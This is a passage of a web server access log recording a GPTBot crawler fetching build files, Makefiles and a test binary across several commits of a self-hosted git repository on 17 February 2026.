4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:15:18:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 9966] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:15:18:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 777] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:15:18:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 4092] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:15:18:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 9946] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:15:18:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 10936] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build" -[17/Feb/2026:15:18:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 9970] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:15:18:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16918] [Gzip 10.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/Makefile" -[17/Feb/2026:15:18:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 28192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/TestApp" -[17/Feb/2026:15:18:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 10934] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build" -[17/Feb/2026:15:18:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 28192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/TestApp" -[17/Feb/2026:15:18:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 9972] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:15:18:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 9969] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:15:18:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 21649] [Gzip 15.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:15:18:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 10773] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build" -[17/Feb/2026:15:18:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16918] [Gzip 10.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/Makefile" -[17/Feb/2026:15:18:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 51202] [Gzip 26.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/TestApp" -[17/Feb/2026:15:18:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 9934] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/TestApp" -[17/Feb/2026:15:18:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 28192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/TestApp" -[17/Feb/2026:15:18:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 9929] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/Makefile" -[17/Feb/2026:15:18:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/TestApp" -[17/Feb/2026:15:18:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 28192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/TestApp" -[17/Feb/2026:15:18:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 51204] [Gzip 26.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/TestApp" -[17/Feb/2026:15:18:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/TestApp" -[17/Feb/2026:15:18:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16918] [Gzip 10.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/Makefile" -[17/Feb/2026:15:18:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11825] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:18:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11163] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:18:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 11269] [Gzip 3.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:18:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11192] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:18:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 29812] [Gzip 7.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:18:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14295] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:18:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 9940] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:18:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 9940] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:18:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/Makefile" -[17/Feb/2026:15:18:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old" [Client 74.7.227.38] [Length 10419] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm" -[17/Feb/2026:15:18:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old" [Client 74.7.227.38] [Length 10419] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm" -[17/Feb/2026:15:18:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 9959] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:18:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11021] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:18:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16047] [Gzip 5.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:18:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 672] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:18:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:18:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10074] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:18:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12010] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:18:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9954] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:18:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 9964] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:15:18:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 9952] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:18:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old" -[17/Feb/2026:15:18:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old" -[17/Feb/2026:15:18:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 39743] [Gzip 13.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:15:18:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 8040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 